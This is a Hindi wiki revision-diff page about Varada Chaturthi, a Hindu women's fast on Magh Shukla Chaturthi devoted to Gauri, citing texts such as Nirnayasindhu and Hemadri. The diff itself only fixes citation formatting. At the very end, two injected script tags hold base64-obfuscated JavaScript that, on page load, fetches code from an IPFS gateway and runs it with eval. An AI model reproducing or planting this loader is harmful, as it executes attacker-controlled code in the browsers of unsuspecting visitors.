Difference between revisions of "वरदा चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 3: Line 3:
 
*वरदाचतुर्थी पर [[गौरी]] देवता की पूजा की जाती है।
 
*वरदाचतुर्थी पर [[गौरी]] देवता की पूजा की जाती है।
 
*वरदाचतुर्थी व्रत नारियों के लिए होता है।
 
*वरदाचतुर्थी व्रत नारियों के लिए होता है।
*गदाधरपद्धति<ref>गदाधरपद्धति कालसार 771)</ref>, हेमाद्रि<ref>हेमाद्रि व्रत खण्ड 1, 531)</ref> में गौरी चतुर्थी का उल्लेख है, जो यही है।  
+
*गदाधरपद्धति<ref>गदाधरपद्धति कालसार 771</ref>, हेमाद्रि<ref>हेमाद्रि व्रत खण्ड 1, 531</ref> में गौरी चतुर्थी का उल्लेख है, जो यही है।  
*निर्णयसिन्धु<ref>निर्णयसिन्धु 133)</ref> के अनुसार [[भाद्रपद]] शुक्ल पक्ष की चर्तुथी को वरदचतुर्थी है, किन्तु पुरुषार्थचिन्तामणि<ref>पुरुषार्थचिन्तामणि 95)</ref> के अनुसार [[मार्गशीर्ष]] शुक्ल की चर्तुथी को इस नाम से पुकारा जाता है।
+
*निर्णयसिन्धु<ref>निर्णयसिन्धु 133</ref> के अनुसार [[भाद्रपद]] शुक्ल पक्ष की चर्तुथी को वरदचतुर्थी है, किन्तु पुरुषार्थचिन्तामणि<ref>पुरुषार्थचिन्तामणि 95</ref> के अनुसार [[मार्गशीर्ष]] शुक्ल की चर्तुथी को इस नाम से पुकारा जाता है।
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • magh shukl paksh ki chartuthi tithi par varadachaturthi vrat kiya jata hai.
  • varadachaturthi par gauri devata ki pooja ki jati hai.
  • varadachaturthi vrat nariyoan ke lie hota hai.
  • gadadharapaddhati[1], hemadri[2] mean gauri chaturthi ka ullekh hai, jo yahi hai.
  • nirnayasindhu[3] ke anusar bhadrapad shukl paksh ki chartuthi ko varadachaturthi hai, kintu purusharthachintamani[4] ke anusar margashirsh shukl ki chartuthi ko is nam se pukara jata hai.

tika tippani aur sandarbh

  1. gadadharapaddhati kalasar 771
  2. hemadri vrat khand 1, 531
  3. nirnayasindhu 133
  4. purusharthachintamani 95

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>